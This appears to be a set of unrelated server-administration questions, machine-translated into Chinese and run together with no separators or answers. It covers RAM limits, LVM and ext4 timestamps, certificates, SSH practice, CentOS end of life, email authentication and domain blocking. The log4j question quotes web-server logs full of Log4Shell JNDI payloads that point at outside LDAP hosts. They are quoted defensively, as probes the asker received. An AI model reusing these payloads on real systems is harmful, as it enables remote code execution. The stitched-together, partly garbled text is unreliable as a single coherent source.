客户端拥有 Windows Server 2016 Essentials。他在他的服务器中安装了 128 GB RAM。但 Windows 报告说,即使安装了整个 128 GB,它也只使用了 64 GB
为什么?可以做什么来使用整个可用 RAM?
我的系统中有一个卷组,由单个物理卷创建。
我正在创建两个逻辑卷 - 一个大小为 100M,另一个大小为 512M。
在 LV 上创建的任何 100M 大小的文件都不会显示出生时间属性。大小为 512M 的 LV 没有这个问题。
关于为什么会这样的任何线索?
物理卷和卷组:
# pvdisplay
--- Physical volume ---
PV Name /dev/sda4
VG Name VG_System
PV Size 400.00 GiB / not usable 4.00 MiB
Allocatable yes
PE Size 4.00 MiB
Total PE 102399
Free PE 38099
Allocated PE 64300
PV UUID Awnq0n-24v1-Z53P-MC09-3Fvv-dc0r-6QvAyX
# vgdisplay VG_System
--- Volume group ---
VG Name VG_System
System ID
Format lvm2
Metadata Areas 1
Metadata Sequence No 25
VG Access read/write
VG Status resizable
MAX LV 0
Cur LV 24
Open LV 22
Max PV 0
Cur PV 1
Act PV 1
VG Size <400.00 GiB
PE Size 4.00 MiB
Total PE 102399
Alloc PE / Size 64300 / 251.17 GiB
Free PE / Size 38099 / 148.82 GiB
VG UUID Zg53rH-kuCI-dWKa-Uo3H-Mr2i-G2As-Wflm0d
第一个LV:
# lvcreate --stripes 1 -n testing -L 100M VG_System
Logical volume "testing" created.
# mkfs.ext4 /dev/VG_System/testing
mke2fs 1.45.6 (20-Mar-2020)
Discarding device blocks: done
Creating filesystem with 102400 1k blocks and 25688 inodes
Filesystem UUID: ac9c1782-7770-4031-bad8-9b76f7577467
Superblock backups stored on blocks:
8193, 24577, 40961, 57345, 73729
Allocating group tables: done
Writing inode tables: done
Creating journal (4096 blocks): done
Writing superblocks and filesystem accounting information: done
# blkid /dev/VG_System/testing
/dev/VG_System/testing: UUID="ac9c1782-7770-4031-bad8-9b76f7577467" BLOCK_SIZE="1024" TYPE="ext4"
# mount /dev/VG_System/testing /mnt/test
# mount | grep test
/dev/mapper/VG_System-testing on /mnt/test type ext4 (rw,relatime,stripe=4)
# touch /mnt/test/a
# stat /mnt/test/a
File: /mnt/test/a
Size: 0 Blocks: 0 IO Block: 1024 regular empty file
Device: 252,23 Inode: 12 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2023-04-13 22:13:43.000000000 +0530
Modify: 2023-04-13 22:13:43.000000000 +0530
Change: 2023-04-13 22:13:43.000000000 +0530
Birth: -
这里的Birth
字段是空的。
第二个LV:
# lvcreate -n testing2 -L 512M VG_System
Logical volume "testing2" created.
# mkfs.ext4 /dev/VG_System/testing2
mke2fs 1.45.6 (20-Mar-2020)
Discarding device blocks: done
Creating filesystem with 131072 4k blocks and 32768 inodes
Filesystem UUID: 0b5e24a9-cdf1-4749-9089-bf0cf1495185
Superblock backups stored on blocks:
32768, 98304
Allocating group tables: done
Writing inode tables: done
Creating journal (4096 blocks): done
Writing superblocks and filesystem accounting information: done
# blkid /dev/VG_System/testing2
/dev/VG_System/testing2: UUID="0b5e24a9-cdf1-4749-9089-bf0cf1495185" BLOCK_SIZE="4096" TYPE="ext4"
# mount /dev/VG_System/testing2 /mnt/test2
# mount | grep test
/dev/mapper/VG_System-testing2 on /mnt/test2 type ext4 (rw,relatime)
# touch /mnt/test2/a
# stat /mnt/test2/a
File: /mnt/test2/a
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: 252,24 Inode: 12 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2023-04-13 22:19:01.873047858 +0530
Modify: 2023-04-13 22:19:01.873047858 +0530
Change: 2023-04-13 22:19:01.873047858 +0530
Birth: 2023-04-13 22:19:01.873047858 +0530
注意确定它是否相关,但是第一个 LV 的安装选项有stripe=4
,而第二个没有这个。除此之外,两个 LV 是相似的。
# lvdisplay VG_System/testing
--- Logical volume ---
LV Path /dev/VG_System/testing
LV Name testing
VG Name VG_System
LV UUID n19sRr-SqHW-znjI-0fEW-MkQX-JRUn-MTmZHF
LV Write Access read/write
LV Creation host, time controller, 2023-04-13 22:12:45 +0530
LV Status available
# open 0
LV Size 100.00 MiB
Current LE 25
Segments 1
Allocation inherit
Read ahead sectors auto
- currently set to 256
Block device 252:23
# lvdisplay VG_System/testing2
--- Logical volume ---
LV Path /dev/VG_System/testing2
LV Name testing2
VG Name VG_System
LV UUID 94oJKP-r2Ob-ReHr-sDSO-t3HY-isJB-ZtEPsq
LV Write Access read/write
LV Creation host, time controller, 2023-04-13 22:18:01 +0530
LV Status available
# open 1
LV Size 512.00 MiB
Current LE 128
Segments 1
Allocation inherit
Read ahead sectors auto
- currently set to 256
Block device 252:24
我们有一个由 GoDaddy 颁发的通配符证书即将更新,我想使用另一家公司(尚未选择)。通配符证书在几个服务器上的十几个站点上使用。在新机构颁发证书与我们可以在所有这些站点和服务器上安装证书之间会有几个小时的间隔。在那段时间里,我们的用户会注意到什么吗,例如,
我想知道,例如,新的权威机构是否向 GoDaddy 发布了一些东西,使 GoDaddy 撤销了他们存档的我们的证书。或者,Web 浏览器是否会发现已安装的证书与新颁发的证书不匹配,从而导致问题。
我们有一台总 RAM 为 64GB 的服务器,应用程序通常最多使用 30GB 的可用 RAM。其中一个应用程序处理大量平面文件,我们遇到了吞吐量问题,即等待磁盘 I/O。在探索可能的解决方案时,出现了 RAM 磁盘的想法。RAM 磁盘的问题是固有的波动性。
我找到了关于 RAM 磁盘、RAID 1 配置和逻辑镜像卷以对物理磁盘进行分组的单独文档,但我似乎找不到任何文档表明这些磁盘复制解决方案是否可以与 RAM 磁盘一起使用。更重要的是,由于想法是让 RAM 磁盘可用于读/写,并让物理磁盘“遮蔽”RAM 磁盘,赶上写入,我们希望 RAM 磁盘成为所有磁盘的“主要”磁盘读/写。
需要注意的是,我们希望避免仅通过 RAM 缓存操作系统的文件,但如果我们可以获得与独立 RAM 磁盘相同的性能,那是可行的。我们最初避免了这种情况,因为通常某些文件不会长时间访问,但仍需要按需读取/写入速度。
我试图了解直接与 root 进行 ssh 或在维护服务器的上下文中创建辅助 sudo 用户之间的技术论点/安全含义。为了澄清,我们谈论的是由单个管理员拥有的服务器。对于在机器上工作的多人来说,很明显,每个真实的人都有唯一的用户和细粒度的权限有审计跟踪的好处。
我的想法是,如果这是一个桌面站,这是有道理的,建议使用非 root 用户进行日常工作,但在服务器上,您通常登录来维护它,并且 99% 的时间您的所有活动都需要 root权限。
那么创建一个“代理”用户是否有任何安全优势,您无论如何都要 sudo 到 root,而不是直接提供对 root 的 ssh 访问?
我能想到的唯一好处是通过默默无闻的安全性,即机器人通常会尝试探测“root”用户。但是从我的角度来看,如果sudoers的用户被盗用了,就和盗用root用户一样,所以游戏结束。
此外,大多数远程管理框架、NAS 系统、管理程序都鼓励使用 root 用户进行 Web 登录。
apache 网络服务器 (apache2) 是否使用 log4j?
我在 Raspberry Pi OS(64 位)上安装了 Apache2 2.4.38(debian),并在我的日志中发现了一些关于来自(蜜罐/扫描仪)、(离线和恶意?)和(我不知道是什么)的CVE-2021-44228的奇怪记录这是)kryptoslogic-cve-2021-44228.com
dataastatistics.com
a8fvkc.dnslog.cn
我现在该怎么办?
log4j2.formatMsgNoLookups = TRUE
日志:
139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
139.59.99.80 - - [11/Dec/2021:20:13:11 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 8456 "-" "Kryptos Logic Telltale"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
137.184.106.119 - - [10/Dec/2021:20:38:18 +0100] "GET / HTTP/1.1" 301 568 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] "GET / HTTP/1.1" 200 6576 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:21 +0100] "GET /favicon.ico HTTP/1.1" 200 7103 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
我是否需要在纯文本和控制台服务器上使用 GPU?没有 GPU,就像没有 iGPU 和 dGPU 一样。我将使用 SSH,所以我不需要显示。
我使用的是 Linux,但操作系统不应该影响结果
我们正在开发一个软件解决方案,我们的一些供应商确实以 CentOS 7 为中心。
CentoS 7 将在 RHEL 7 生命周期的剩余时间内继续生产,该生命周期将在 2024 年的某个时间结束。
CentOS 8 将在 2021 年 12 月之前收到更新。
CentOS Stream 由 Red Hat 宣布,但显然不是 CentOS 的替代品。
如果在不久的将来 CentOS 的选项不确定,我不太喜欢在这方面进行深入研究。
问题:当 RHEL 7 达到其生命周期并且用户需要生产就绪服务器时,CentOS 7 用户有哪些选择?
如果我尝试从 debian 9 访问具有 certbot 颁发的证书的 HTTPS 服务器,我会收到以下错误:
# curl -v https://hu.dbpedia.org/
* Trying 195.111.2.82...
* TCP_NODELAY set
* Connected to hu.dbpedia.org (195.111.2.82) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
* successfully set certificate verify locations:
* CAfile: /etc/ssl/certs/ca-certificates.crt
CApath: /etc/ssl/certs
* TLSv1.2 (OUT), TLS header, Certificate Status (22):
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (OUT), TLS alert, Server hello (2):
* SSL certificate problem: certificate has expired
* Curl_http_done: called premature == 1
* stopped the pause stream!
* Closing connection 0
curl: (60) SSL certificate problem: certificate has expired
但是,如果我从 debian 10 尝试相同的命令,它会成功。
我尝试使用 rsync 简单地将所有 ca-certificates 从 debian 10 VM 复制到 debian 9 VM(到 /usr/local/share/ca-certificates),然后运行update-ca-certificates
似乎添加了 400 多个证书。不幸的是,它没有帮助。这并不奇怪,因为显然 debian 9 和 10 上似乎有相同的证书。
我的问题是:如何在不完全忽略证书验证的情况下从 debian 9 机器访问带有 certbot 证书的站点
最终编辑:我似乎对 DKIM 完全错误,签名域不必与发件人域相同,因此我的问题的整个前提是有缺陷的。非常感谢保罗指出我的错误!
下面的原始问题:
我已尝试阅读 SPF 和 DKIM,但我不明白同时使用两者的意义,至少在打击垃圾邮件的情况下(伪造的发件人地址,这可能导致我的电子邮件服务器/域被列入黑名单)。据我所知,仅 DKIM 就应该完成 SPF 应该完成的工作。
到目前为止,我的理解如下:
我不明白的是:除非 DKIM 私钥以某种方式受到损害,否则仅 DKIM 验证就足以验证电子邮件是从授权的电子邮件服务器发送的,否则电子邮件服务器将不会用于签署电子邮件的私钥。
我在这里看到了一个非常相似的问题的答案:https ://serverfault.com/a/780248/154775 ,其中作者声称 DKIM 无法防止重放攻击。我会承认这一点,但我发现这是一个极端情况,我认为迄今为止最大的问题是带有虚假发件人地址的垃圾邮件 - DKIM 应该可以自己轻松地防止这种情况。
与仅 DKIM 相比,是否存在 SPF 提供额外保护的重放攻击以外的场景?
编辑:我用粗体标记了我的问题的核心,以澄清我到底想要回答什么。
我正在帮助运营一个网站,该网站因政治原因被之前试图阻止 Telegram (RosKomNadzor) 的同一个俄罗斯机构阻止。这不是第一次发生,以前我们只会更改域,但这有其自身的影响和读者群的损失。
他们只阻止域名,而不是 IP(无论如何我们都在使用 Cloudflare)。我们正在使用 HTTPS,但 ISP 仍然能够以某种方式从他们的客户端获取有关我们的请求的 DNS 信息。从技术上讲,我们可以建议我们的读者配置他们的/etc/hosts
,但这不是一个可行的选择。
是否可以在我们的服务器端加密/混淆 DNS 信息,而无需用户进行任何更改/安装软件?还是等待 DNS over HTTPS 成为我们唯一的选择?
来自俄罗斯的爱。